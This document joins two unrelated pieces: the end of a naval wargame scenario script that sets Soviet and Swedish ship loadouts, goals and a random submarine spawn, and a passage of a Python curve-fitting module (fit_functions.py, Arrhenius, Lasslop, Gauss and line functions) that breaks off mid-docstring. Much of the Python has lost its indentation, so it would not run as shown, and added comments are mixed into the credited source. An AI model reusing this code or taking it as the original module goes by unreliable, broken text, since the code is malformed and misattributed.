SM.AddUnitToAlliance(unit, 2)
SM.SetUnitLauncherItem(unit.unitName, 0, '5V55RM', 64)
SM.SetUnitLauncherItem(unit.unitName, 1, '9M33M', 20)
SM.SetUnitLauncherItem(unit.unitName, 2, '9M33M', 20)
SM.SetUnitLauncherItem(unit.unitName, 3, '130mm F-44 HE', 100)
SM.SetUnitLauncherItem(unit.unitName, 4, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 5, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 6, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 7, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 8, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 9, '30mm OF-84 HE-FRAG AK-630M', 59)
SM.SetUnitLauncherItem(unit.unitName, 10, '53-65M', 5)
SM.SetUnitLauncherItem(unit.unitName, 11, '53-65M', 5)
SM.SetUnitLauncherItem(unit.unitName, 12, '3M45 Granit', 16)
UI = SM.GetUnitInterface(unit.unitName)
SM.AddToUnitMagazine("Moskva", 'Fuel', 68850)
SM.AddToUnitMagazine("Moskva", 'AT-1', 26)
SM.AddToUnitMagazine("Moskva", 'DICASS (80) Sonobuoy', 175)
SM.AddToUnitMagazine("Moskva", 'LOFAR (80) Sonobuoy', 175)
SM.AddToUnitMagazine("Moskva", 'DIFAR (80) Sonobuoy', 490)
SM.AddToUnitMagazine("Moskva", '30mm OF-84 HE-FRAG AK-630M', 1416)
SM.AddToUnitMagazine("Moskva", '130mm F-44 HE', 500)
SM.AddToUnitMagazine("Moskva", '53-65M', 30)
UI.SetSensorState(6, 1)
UI.AddTask('EngageAll', 2.000000, 0)
UI.AddTask('MissileWarning', 0.000000, 0)
UI.AddTask('PointDefense', 3.000000, 3)
UI.AddTask('RefuelAllAircraft', 3.000000, 3)
BB = UI.GetBlackboardInterface()
BB.Write('129_EngageLimit', '1')
BB.Write('16_EngageLimit', '4')
BB.Write('17_EngageLimit', '6')
BB.Write('18_EngageLimit', '12')
BB.Write('22_EngageLimit', '24')
BB.Write('256_EngageLimit', '2')
BB.Write('257_EngageLimit', '24')
BB.Write('258_EngageLimit', '2')
BB.Write('32_EngageLimit', '1')
BB.Write('33_EngageLimit', '1')
BB.Write('34_EngageLimit', '1')
BB.Write('64_EngageLimit', '1')
BB.Write('ID_EngageLimit', '{"12": "0"}')
BB.Write('InvMulti', '1')
BB.Write('MissionTarget', '["Target", 12]')
BB.Write('Selected', '{"RotaryWing": 0, "Speed-": 10, "Alt+": 0, "Speed+": 10, "RadarMast+": 0, "RadarMast-": 0, "34_EngageLimit": "1", "257_EngageLimit": "24", "17_EngageLimit": "6", "UnitCount": 4, "HasECM": 0, "HasTarget": 0, "TargetDatum": 0, "Alliance0_EngageLimit": -1, "FixedLand": 0, "Launchers": 1, "Periscope-": 0, "FixedWing": 0, "MagWeaponList": {"30mm OF-84 HE-FRAG AK-630M": 8496, "TEST-68": 0, "RPK-6 Vodopod": 0, "SAET-60M": 0, "130mm F-44 HE": 500, "SET-65M": 0, "3M45 Granit": 0, "30mm OP-84 FRAG Tracer AK-630M": 0, "Yu-6": 0, "130mm ZS-44 AA": 0, "RPK-3 Metel": 0, "SET-65": 0, "TEST-71": 0, "53-56V": 0, "5V55RM": 0, "AT-2M": 0, "76.2mm OS-62 FRAG": 0, "9M33M": 0, "53-56": 0, "130mm ZS-44P AA": 0, "76.2mm ZS-63 AA": 0, "9M32 Strela 2": 48, "USET-80": 0, "Shkval": 0, "53-65M": 76}, "Air": 0, "64_EngageLimit": "1", "HasAIWeap": 0, "18_EngageLimit": "12", "256_EngageLimit": "2", "Depth+": 0, "MobileLand": 0, "CanStrafe": 0, "Depth-": 0, "HasSonarP": 1, "HasThrottle": 0, "PeriDeep": 0, "Sub": 0, "HasSonarA": 1, "HasFlightPort": 1, "HasMagazine": 1, "DieselSub": 0, "HasGBU": 0, "HasAINav": 0, "FormMember": 3, "Alliance1_EngageLimit": -1, "HasBombs": 0, "Snorkel-": 0, "TargetTrack": 1, "Snorkel+": 0, "16_EngageLimit": "4", "Alliance2_EngageLimit": -1, "258_EngageLimit": "2", "FormLeader": 1, "129_EngageLimit": "1", "HasESM": 1, "Periscope+": 0, "22_EngageLimit": "24", "FormModeSprint": 0, "32_EngageLimit": "1", "Tasks": {"MissileWarning": 2, "Nav": 1, "EngageAll": 2}, "HasOptical": 1, "33_EngageLimit": "1", "HasRadar": 1, "Ship": 4, "TargetSet": 0, "FormModePace": 3, "WeaponList": {"130mm F-44 HE": [100, 100], "5V55RM": [64, 64], "3M45 Granit": [16, 16], "9M32 Strela 2": [24, 24], "30mm OF-84 HE-FRAG AK-630M": [354, 354], "76.2mm OS-62 FRAG": [608, 608], "9M33M": [80, 80], "53-65M": [14, 14], "RPK-3 Metel": [4, 4]}}')
BB.Write('loadouts_dict', '{"Torpedoes": {"Ka-27A": {"T 1997": {"DICASS (90) Sonobuoy": 5, "AT-1": 2, "LOFAR (90) Sonobuoy": 5, "DIFAR (90) Sonobuoy": 14}, "T CHN 1982": {"DIFAR (75) Sonobuoy": 14, "DICASS (75) Sonobuoy": 5, "Yu-7": 2, "LOFAR (75) Sonobuoy": 5}, "T CHN 1987": {"DICASS (80) Sonobuoy": 5, "LOFAR (80) Sonobuoy": 5, "DIFAR (80) Sonobuoy": 14, "Yu-7": 2}, "T 1992": {"DICASS (85) Sonobuoy": 5, "LOFAR (85) Sonobuoy": 5, "DIFAR (85) Sonobuoy": 14, "AT-1": 2}, "T CHN 1977": {"DIFAR (70) Sonobuoy": 14, "DICASS (70) Sonobuoy": 5, "Yu-7": 2, "LOFAR (70) Sonobuoy": 5}, "T CHN 1997": {"DICASS (90) Sonobuoy": 5, "LOFAR (90) Sonobuoy": 5, "Yu-7": 2, "DIFAR (90) Sonobuoy": 14}, "T CHN 1972": {"DIFAR (65) Sonobuoy": 14, "DICASS (65) Sonobuoy": 5, "LOFAR (65) Sonobuoy": 5, "Yu-7": 2}, "T CHN 1992": {"DICASS (85) Sonobuoy": 5, "LOFAR (85) Sonobuoy": 5, "DIFAR (85) Sonobuoy": 14, "Yu-7": 2}, "T 2002": {"DICASS (95) Sonobuoy": 5, "LOFAR (95) Sonobuoy": 5, "AT-1": 2, "DIFAR (95) Sonobuoy": 14}, "T 2012": {"DICASS (105) Sonobuoy": 5, "AT-1": 2, "LOFAR (105) Sonobuoy": 5, "DIFAR (105) Sonobuoy": 14}, "T 2007": {"DICASS (100) Sonobuoy": 5, "LOFAR (100) Sonobuoy": 5, "AT-1": 2, "DIFAR (100) Sonobuoy": 14}, "T CHN 2007": {"DICASS (100) Sonobuoy": 5, "LOFAR (100) Sonobuoy": 5, "Yu-7": 2, "DIFAR (100) Sonobuoy": 14}, "T CHN 2012": {"DICASS (105) Sonobuoy": 5, "AT-1": 2, "LOFAR (105) Sonobuoy": 5, "DIFAR (105) Sonobuoy": 14}, "T CHN 2002": {"DICASS (95) Sonobuoy": 5, "LOFAR (95) Sonobuoy": 5, "Yu-7": 2, "DIFAR (95) Sonobuoy": 14}, "T 1982": {"DIFAR (75) Sonobuoy": 14, "DICASS (75) Sonobuoy": 5, "AT-1": 2, "LOFAR (75) Sonobuoy": 5}, "T 1987": {"DICASS (80) Sonobuoy": 5, "LOFAR (80) Sonobuoy": 5, "DIFAR (80) Sonobuoy": 14, "AT-1": 2}}}}')
leader_id = UI.LookupFriendlyId('Letuchiy')
UI.SetFormationLeader(leader_id)
UI.SetFormationMode(1)
UI.SetFormationPosition(2.286, 0.632, 3.082, 0.278)
UI.SetFormationAltitudeOffset(0.0)
UI.SetFormationUseNorthBearing(0)
SM.AddUnitToFlightDeck('Moskva', 'Ka-27A', 'Atlant Ka-27 1', 1)
SM.SetFlightDeckUnitLoadout('Moskva', 'Atlant Ka-27 1', '5 DICASS (80) Sonobuoy;5 LOFAR (80) Sonobuoy;14 DIFAR (80) Sonobuoy;2 AT-1;')
FP = UI.GetFlightPortInfo()
base_track = UI.GetTrackById(UI.GetPlatformId())
##############################
### Alliance 3 units
##############################
unit = SM.GetDefaultUnit()
unit.className = 'Patrol Boat'
unit.unitName = "Swedish Patrol Boat"
unit.SetPosition(15.090047, 68.170519, 0.0)
unit.heading = -116.25
unit.speed = 20.4
unit.cost = 20000000.0
SM.AddUnitToAlliance(unit, 3)
SM.SetUnitLauncherItem(unit.unitName, 0, 'SAM-I', 10)
UI = SM.GetUnitInterface(unit.unitName)
UI.AddTask('MissileWarning', 3.000000, 3)
UI.AddTask('Nav', 1.000000, 0)
UI.AddNavWaypointAdvanced(0.259547, 1.188854, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.252271, 1.188998, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.254573, 1.185606, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.264604, 1.188751, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.264645, 1.191259, 0.000000, 0.000000)
UI.AddNavWaypointAdvanced(0.250380, 1.188114, 0.000000, 0.000000)
UI.SetNavLoopState(1)
UI.AddTask('PointDefense', 3.000000, 3)
BB = UI.GetBlackboardInterface()
##############################
### Alliance 1 goals
##############################
goal_temp = SM.DestroyGoal('')
goal_temp.AddTarget('Nikolay Vilkov')
goal_temp.AddTarget('BDK-13')
goal_temp.SetQuantity(2)
SM.SetAllianceGoal(1, goal_temp)
SM.SetAllianceROEByType(1, 2, 2, 2, 2)
##############################
### Alliance 2 goals
##############################
goal_temp = SM.AreaGoal()
goal_temp.SetTargetList('Nikolay Vilkov, BDK-13')
goal_temp.SetTimeObjective(0.000000)
goal_temp.SetLogicAny(1)
goal_temp.SetQuantity(1)
goal_temp.AddPointDeg(16.09006, 68.40239)
goal_temp.AddPointDeg(16.00545, 68.33701)
goal_temp.AddPointDeg(15.89431, 68.35856)
goal_temp.AddPointDeg(16.02083, 68.42163)
SM.SetAllianceGoal(2, goal_temp)
SM.SetAllianceROEByType(2, 2, 2, 2, 2)
##############################
### Alliance 3 goals
##############################
goal_temp = SM.TimeGoal()
goal_temp.SetPassTimeout(36000.0)
goal_temp.SetFailTimeout(59940.0)
SM.SetAllianceGoal(3, goal_temp)
SM.SetAllianceROEByType(3, 0, 0, 0, 0)
##############################
### Overlay Graphics
##############################
##############################
### Randomization Info
##############################
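# The Gotland submarine is included in a given run with probability 0.5 and,
# when present, spawns inside the box below (by the scenario's coordinates,
# apparently a lon pair followed by a lat pair, in degrees).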
SM.SetIncludeProbability('Gotland SSK (Prototype)', 0.500000)
SM.AddRandomBox('Gotland SSK (Prototype)', 14.6166, 14.9699, 68.0056, 68.1246)
# === Source file: jams/functions/fit_functions.py (MuellerSeb/jams_python, MIT License) ===
#!/usr/bin/env python
"""
Module defines common functions that are used in curve_fit or fmin
parameter estimations.
For all fit functions, it defines the functions in two forms (ex. of 3
params):
`func(x, p1, p2, p3)`
`func_p(x, p)` with `p[0:3]`
The first form can be used, for example, with
`scipy.optimize.curve_fit` (ex. function f1x=a+b/x):
`p, cov = scipy.optimize.curve_fit(functions.f1x, x, y, p0=[p0,p1])`
It also defines two cost functions along with the fit functions, one
with the absolute sum, one with the squared sum of the deviations:
`cost_func` `sum(abs(obs-func))`
`cost2_func` `sum((obs-func)**2)`
These cost functions can be used, for example, with
`scipy.optimize.minimize`:
`p = scipy.optimize.minimize(jams.functions.cost_f1x, np.array([p1,p2]), args=(x,y), method='Nelder-Mead', options={'disp':False})`
Note the different argument orders:
`curve_fit` needs `f(x,*args)` with the independent variable as the
first argument and the parameters to fit as separate remaining
arguments.
`minimize` is a general minimiser with respect to the first argument,
i.e. `func(p,*args)`.
The module provides also two common cost functions (absolute and
squared deviations) where any function in the form `func(x, p)` can be
used as second argument:
`cost_abs(p, func, x, y)`
`cost_square(p, func, x, y)`
This means, for example `cost_f1x(p, x, y)` is the same as
`cost_abs(p, functions.f1x_p, x, y)`.
For example:
`p = scipy.optimize.minimize(jams.functions.cost_abs, np.array([p1,p2]), args=(functions.f1x_p,x,y), method='Nelder-Mead', options={'disp':False})`
The current functions are listed below, with the function name in the
first column. The second form has '\_p' appended to the name, and the
cost functions have 'cost\_' and 'cost2\_' prepended to the name:
arrhenius 1 param: Arrhenius temperature dependence of biochemical rates: `exp((T-TC25)*E/(T25*R*(T+T0)))`, parameter: E
f1x 2 params: General 1/x function: `a + b/x`
fexp 3 params: General exponential function: `a + b * exp(c*x)`
gauss 2 params: Gauss function: `1/(sig*sqrt(2*pi)) *exp(-(x-mu)**2/(2*sig**2))`, parameter: mu, sig
lasslop 6 params: Lasslop et al. (2010) a rectangular, hyperbolic light-response GPP with Lloyd & Taylor (1994) respiration and the maximum canopy uptake rate at light saturation decreases exponentially with VPD as in Koerner (1995)
line0 1 param: Straight line through origin: `a*x`
line 2 params: Straight line: `a + b*x`
lloyd_fix 2 params: Lloyd & Taylor (1994) Arrhenius type with T0=-46.02 degC and Tref=10 degC
lloyd_only_rref 1 param: Lloyd & Taylor (1994) Arrhenius type with fixed exponential term
logistic 3 params: Logistic function: `a/(1+exp(-b(x-c)))`
logistic_offset 4 params: Logistic function with offset: `a/(1+exp(-b(x-c))) + d`
logistic2_offset 7 params: Double logistic function with offset `L1/(1+exp(-k1(x-x01))) - L2/(1+exp(-k2(x-x02))) + a`
poly n params: General polynomial: `c0 + c1*x + c2*x**2 + ... + cn*x**n`
sabx 2 params: sqrt(f1x), i.e. general sqrt(1/x) function: `sqrt(a + b/x)`
see 3 params: Sequential Elementary Effects fitting function: `a*(x-b)**c`
This module was written by Matthias Cuntz while at Department of
Computational Hydrosystems, Helmholtz Centre for Environmental
Research - UFZ, Leipzig, Germany, and continued while at Institut
National de Recherche pour l'Agriculture, l'Alimentation et
l'Environnement (INRAE), Nancy, France.
Copyright (c) 2012-2020 Matthias Cuntz - mc (at) macu (dot) de
Released under the MIT License; see LICENSE file for details.
* Written Dec 2012 by Matthias Cuntz (mc (at) macu (dot) de)
* Ported to Python 3, Feb 2013, Matthias Cuntz
* Added general cost functions cost_abs and cost_square, May 2013, Matthias Cuntz
* Added line0, Feb 2014, Matthias Cuntz
* Removed multiline_p, May 2020, Matthias Cuntz
* Changed to Sphinx docstring and numpydoc, May 2020, Matthias Cuntz
.. moduleauthor:: Matthias Cuntz
The following functions are provided:
.. autosummary::
cost_abs
cost_square
arrhenius
arrhenius_p
cost_arrhenius
cost2_arrhenius
f1x
f1x_p
cost_f1x
cost2_f1x
fexp
fexp_p
cost_fexp
cost2_fexp
gauss
gauss_p
cost_gauss
cost2_gauss
lasslop
lasslop_p
cost_lasslop
cost2_lasslop
line
line_p
cost_line
cost2_line
line0
line0_p
cost_line0
cost2_line0
lloyd_fix
lloyd_fix_p
cost_lloyd_fix
cost2_lloyd_fix
lloyd_only_rref
lloyd_only_rref_p
cost_lloyd_only_rref
cost2_lloyd_only_rref
sabx
sabx_p
cost_sabx
cost2_sabx
poly
poly_p
cost_poly
cost2_poly
cost_logistic
cost2_logistic
cost_logistic_offset
cost2_logistic_offset
cost_logistic2_offset
cost2_logistic2_offset
see
see_p
cost_see
cost2_see
"""
from __future__ import division, absolute_import, print_function
import numpy as np
import scipy.special as sp
try:  # import inside package
    from .logistic_function import logistic_p, logistic_offset_p, logistic2_offset_p
    from ..const import T0, T25, R
except ImportError:
    try:  # e.g. python nee2gpp.py
        from functions.logistic_function import logistic_p, logistic_offset_p, logistic2_offset_p
        from const import T0, T25, R
    except ImportError:  # python fit_functions.py
        from logistic_function import logistic_p, logistic_offset_p, logistic2_offset_p
        T0 = 273.15       # Celsius <-> Kelvin offset [K]
        T25 = 298.15      # Standard ambient temperature [K]
        R = 8.3144621     # Ideal gas constant [J K^-1 mol^-1]
__all__ = ['cost_abs', 'cost_square',
'arrhenius', 'arrhenius_p', 'cost_arrhenius', 'cost2_arrhenius',
'f1x', 'f1x_p', 'cost_f1x', 'cost2_f1x',
'fexp', 'fexp_p', 'cost_fexp', 'cost2_fexp',
'gauss', 'gauss_p', 'cost_gauss', 'cost2_gauss',
'lasslop', 'lasslop_p', 'cost_lasslop', 'cost2_lasslop',
'line', 'line_p', 'cost_line', 'cost2_line',
'line0', 'line0_p', 'cost_line0', 'cost2_line0',
'lloyd_fix', 'lloyd_fix_p', 'cost_lloyd_fix', 'cost2_lloyd_fix',
'lloyd_only_rref', 'lloyd_only_rref_p', 'cost_lloyd_only_rref', 'cost2_lloyd_only_rref',
'sabx', 'sabx_p', 'cost_sabx', 'cost2_sabx',
'poly', 'poly_p', 'cost_poly', 'cost2_poly',
'cost_logistic', 'cost2_logistic',
'cost_logistic_offset', 'cost2_logistic_offset',
'cost_logistic2_offset', 'cost2_logistic2_offset',
'see', 'see_p', 'cost_see', 'cost2_see']
# -----------------------------------------------------------
# general cost functions
def cost_abs(p, func, x, y):
"""
General cost function for robust optimising `func(x,p)` vs. `y` with sum of absolute deviations.
Parameters
----------
p : iterable of floats
parameters
func : callable
`fun(x,p) -> float`
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-func(x,p)))
def cost_square(p, func, x, y):
"""
General cost function for optimising `func(x,p)` vs. `y` with sum of square deviations.
Parameters
----------
p : iterable of floats
parameters
func : callable
`fun(x,p) -> float`
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-func(x,p))**2)
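# Illustrative sketch (not part of the original module): the generic cost
# functions pair with any func_p-style function, e.g. fitting a straight line
# robustly via scipy.optimize.minimize. Data and start values are made up;
# line_p is defined further below.
#     import scipy.optimize as opt
#     x = np.arange(1., 11.)
#     y = 2. + 3.*x
#     res = opt.minimize(cost_abs, np.array([1., 1.]),
#                        args=(line_p, x, y), method='Nelder-Mead')
#     # res.x is close to [2., 3.]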
# -----------------------------------------------------------
# arrhenius
def arrhenius(T, E):
"""
Arrhenius temperature dependence of rates.
Parameters
----------
T : float or array_like of floats
temperature [degC]
E : float
activation energy [J]
Returns
-------
float
function value(s)
"""
return np.exp((T-(T25-T0))*E/(T25*R*(T+T0)))
def arrhenius_p(T, p):
"""
Arrhenius temperature dependence of rates.
Parameters
----------
T : float or array_like of floats
temperature [degC]
p : iterable
`p[0]` is activation energy [J]
Returns
-------
float
function value(s)
"""
return np.exp((T-(T25-T0))*p[0]/(T25*R*(T+T0)))
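# Note: T25 - T0 = 25, so the exponent vanishes at T = 25 degC and
# arrhenius() returns 1 there; rates are normalised to their value at 25 degC.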
def cost_arrhenius(p, T, rate):
"""
    Sum of absolute deviations of obs and Arrhenius function.
    Parameters
    ----------
    p : iterable of floats
        `p[0]` is activation energy [J]
    T : float or array_like of floats
        temperature [degC]
    rate : float or array_like of floats
        dependent variable, observed rates
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(rate-arrhenius_p(T,p)))
def cost2_arrhenius(p, T, rate):
"""
    Sum of squared deviations of obs and Arrhenius function.
    Parameters
    ----------
    p : iterable of floats
        `p[0]` is activation energy [J]
    T : float or array_like of floats
        temperature [degC]
    rate : float or array_like of floats
        dependent variable, observed rates
Returns
-------
float
sum of squared deviations
"""
return np.sum((rate-arrhenius_p(T,p))**2)
# -----------------------------------------------------------
# a+b/x
def f1x(x,a,b):
"""
General 1/x function: a + b/x
Parameters
----------
x : float or array_like of floats
independent variable
a : float
first parameter
b : float
second parameter
Returns
-------
float
function value(s)
"""
return a+b/x
def f1x_p(x,p):
"""
General 1/x function: a + b/x
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
Returns
-------
float
function value(s)
"""
return p[0]+p[1]/x
def cost_f1x(p,x,y):
"""
Sum of absolute deviations of obs and general 1/x function: a + b/x
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-f1x_p(x,p)))
def cost2_f1x(p,x,y):
"""
Sum of squared deviations of obs and general 1/x function: a + b/x
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-f1x_p(x,p))**2)
# -----------------------------------------------------------
# a+b*exp(c*x)
def fexp(x,a,b,c):
"""
General exponential function: a + b * exp(c*x)
Parameters
----------
x : float or array_like of floats
independent variable
a : float
first parameter
b : float
second parameter
c : float
third parameter
Returns
-------
float
function value(s)
"""
return a+b*np.exp(c*x)
def fexp_p(x,p):
"""
General exponential function: a + b * exp(c*x)
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` a
`p[1]` b
`p[2]` c
Returns
-------
float
function value(s)
"""
return p[0]+p[1]*np.exp(p[2]*x)
def cost_fexp(p,x,y):
"""
Sum of absolute deviations of obs and general exponential function: a + b * exp(c*x)
Parameters
----------
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` a
`p[1]` b
`p[2]` c
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-fexp_p(x,p)))
def cost2_fexp(p,x,y):
"""
Sum of squared deviations of obs and general exponential function: a + b * exp(c*x)
Parameters
----------
p : iterable of floats
parameters (`len(p)=3`)
`p[0]` a
`p[1]` b
`p[2]` c
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-fexp_p(x,p))**2)
# -----------------------------------------------------------
# Gauss: 1/(sig*sqrt(2*pi)) *exp(-(x-mu)**2/(2*sig**2))
def gauss(x,mu,sig):
"""
Gauss function: 1 / (sqrt(2*pi)*sig) * exp( -(x-mu)**2 / (2*sig**2) )
Parameters
----------
x : float or array_like of floats
independent variable
mu : float
mean
sig : float
width
Returns
-------
float
function value(s)
"""
return np.exp(-(x-mu)**2/(2.*sig**2))/(sig*np.sqrt(2.*np.pi))
def gauss_p(x,p):
"""
Gauss function: 1 / (sqrt(2*pi)*sig) * exp( -(x-mu)**2 / (2*sig**2) )
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` mean
`p[1]` width
Returns
-------
float
function value(s)
"""
return np.exp(-(x-p[0])**2/(2.*p[1]**2))/(p[1]*np.sqrt(2.*np.pi))
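# Sanity note (assumes scipy is available): gauss(x, mu, sig) is the normal
# probability density, identical to scipy.stats.norm.pdf(x, loc=mu, scale=sig).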
def cost_gauss(p,x,y):
"""
Sum of absolute deviations of obs and Gauss function: 1 / (sqrt(2*pi)*sig) * exp( -(x-mu)**2 / (2*sig**2) )
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` mean
`p[1]` width
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-gauss_p(x,p)))
def cost2_gauss(p,x,y):
"""
Sum of squared deviations of obs and Gauss function: 1 / (sqrt(2*pi)*sig) * exp( -(x-mu)**2 / (2*sig**2) )
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` mean
`p[1]` width
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-gauss_p(x,p))**2)
# -----------------------------------------------------------
# lasslop
def lasslop(Rg, et, VPD, alpha, beta0, k, Rref):
"""
Lasslop et al. (2010) is the rectangular, hyperbolic light-response
of NEE as by Falge et al. (2001), where the respiration is calculated
with Lloyd & Taylor (1994), and the maximum canopy uptake rate at
light saturation decreases exponentially with VPD as in Koerner (1995).
Parameters
----------
Rg : float or array_like of floats
Global radiation [W m-2]
et : float or array_like of floats
Exponential in Lloyd & Taylor: np.exp(E0*(1./(Tref-T0)-1./(T-T0))) []
VPD : float or array_like of floats
Vapour Pressure Deficit [Pa]
alpha : float
Light use efficiency, i.e. initial slope of light response curve [umol(C) J-1]
beta0 : float
Maximum CO2 uptake rate at VPD0=10 hPa [umol(C) m-2 s-1]
k : float
e-folding of exponential decrease of maximum CO2 uptake with VPD increase [Pa-1]
Rref : float
Respiration at Tref (10 degC) [umol(C) m-2 s-1]
Returns
-------
float
net ecosystem exchange [umol(CO2) m-2 s-1]
"""
# Lloyd & Taylor (1994)
gamma = Rref*et
# Koerner (1995)
VPD0 = 1000. # 10 hPa
kk = np.clip(-k*(VPD-VPD0), -600., 600.)
beta = np.where(VPD > VPD0, beta0*np.exp(kk), beta0)
return -alpha*beta*Rg/(alpha*Rg+beta) + gamma
def lasslop_p(Rg, et, VPD, p):
"""
Lasslop et al. (2010) is the rectangular, hyperbolic light-response
of NEE as by Falge et al. (2001), where the respiration is calculated
with Lloyd & Taylor (1994), and the maximum canopy uptake rate at
light saturation decreases exponentially with VPD as in Koerner (1995).
Parameters
----------
Rg : float or array_like of floats
Global radiation [W m-2]
et : float or array_like of floats
Exponential in Lloyd & Taylor: np.exp(E0*(1./(Tref-T0)-1./(T-T0))) []
VPD : float or array_like of floats
Vapour Pressure Deficit [Pa]
p : iterable of floats
parameters (`len(p)=4`)
`p[0]` Light use efficiency, i.e. initial slope of light response curve [umol(C) J-1]
`p[1]` Maximum CO2 uptake rate at VPD0=10 hPa [umol(C) m-2 s-1]
`p[2]` e-folding of exponential decrease of maximum CO2 uptake with VPD increase [Pa-1]
`p[3]` Respiration at Tref (10 degC) [umol(C) m-2 s-1]
Returns
-------
float
net ecosystem exchange [umol(CO2) m-2 s-1]
"""
# Lloyd & Taylor (1994)
gamma = p[3]*et
# Koerner (1995)
VPD0 = 1000. # 10 hPa
kk = np.clip(-p[2]*(VPD-VPD0), -600., 600.)
beta = np.where(VPD > VPD0, p[1]*np.exp(kk), p[1])
return -p[0]*beta*Rg/(p[0]*Rg+beta) + gamma
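# Quick check with made-up values (not from the original module): for
# VPD <= VPD0 the exponential VPD limitation is inactive, so
#     lasslop(Rg=500., et=1., VPD=1000., alpha=0.01, beta0=10., k=0., Rref=2.)
# reduces to -alpha*beta0*Rg/(alpha*Rg + beta0) + Rref*et.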
def cost_lasslop(p, Rg, et, VPD, NEE):
"""
Sum of absolute deviations of obs and Lasslop.
Parameters
----------
p : iterable of floats
parameters (`len(p)=4`)
`p[0]` Light use efficiency, i.e. initial slope of light response curve [umol(C) J-1]
`p[1]` Maximum CO2 uptake rate at VPD0=10 hPa [umol(C) m-2 s-1]
`p[2]` e-folding of exponential decrease of maximum CO2 uptake with VPD increase [Pa-1]
`p[3]` Respiration at Tref (10 degC) [umol(C) m-2 s-1]
Rg : float or array_like of floats
Global radiation [W m-2]
et : float or array_like of floats
Exponential in Lloyd & Taylor: np.exp(E0*(1./(Tref-T0)-1./(T-T0))) []
VPD : float or array_like of floats
Vapour Pressure Deficit [Pa]
NEE : float or array_like of floats
Observed net ecosystem exchange [umol(CO2) m-2 s-1]
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(NEE-lasslop(Rg, et, VPD, p[0], p[1], p[2], p[3])))
def cost2_lasslop(p, Rg, et, VPD, NEE):
"""
Sum of squared deviations of obs and Lasslop.
Parameters
----------
p : iterable of floats
parameters (`len(p)=4`)
`p[0]` Light use efficiency, i.e. initial slope of light response curve [umol(C) J-1]
`p[1]` Maximum CO2 uptake rate at VPD0=10 hPa [umol(C) m-2 s-1]
`p[2]` e-folding of exponential decrease of maximum CO2 uptake with VPD increase [Pa-1]
`p[3]` Respiration at Tref (10 degC) [umol(C) m-2 s-1]
Rg : float or array_like of floats
Global radiation [W m-2]
et : float or array_like of floats
Exponential in Lloyd & Taylor: np.exp(E0*(1./(Tref-T0)-1./(T-T0))) []
VPD : float or array_like of floats
Vapour Pressure Deficit [Pa]
NEE : float or array_like of floats
Observed net ecosystem exchange [umol(CO2) m-2 s-1]
Returns
-------
float
sum of squared deviations
"""
return np.sum((NEE-lasslop(Rg, et, VPD, p[0], p[1], p[2], p[3]))**2)
# -----------------------------------------------------------
# a+b*x
def line(x,a,b):
"""
Straight line: a + b*x
Parameters
----------
x : float or array_like of floats
independent variable
a : float
first parameter
b : float
second parameter
Returns
-------
float
function value(s)
"""
return a+b*x
def line_p(x,p):
"""
Straight line: a + b*x
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
Returns
-------
float
function value(s)
"""
return p[0]+p[1]*x
def cost_line(p,x,y):
"""
Sum of absolute deviations of obs and straight line: a + b*x
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of absolute deviations
"""
return np.sum(np.abs(y-line_p(x,p)))
def cost2_line(p,x,y):
"""
Sum of squared deviations of obs and straight line: a + b*x
Parameters
----------
p : iterable of floats
parameters (`len(p)=2`)
`p[0]` a
`p[1]` b
x : float or array_like of floats
independent variable
y : float or array_like of floats
dependent variable, observations
Returns
-------
float
sum of squared deviations
"""
return np.sum((y-line_p(x,p))**2)
# -----------------------------------------------------------
# b*x
def line0(x,a):
"""
Straight line through origin: a*x
Parameters
----------
x : float or array_like of floats
independent variable
a : float
first parameter
Returns
-------
float
function value(s)
"""
return a*x
def line0_p(x,p):
"""
Straight line through origin: a*x
Parameters
----------
x : float or array_like of floats
independent variable
p : iterable of floats
`p[0]` is a
Returns
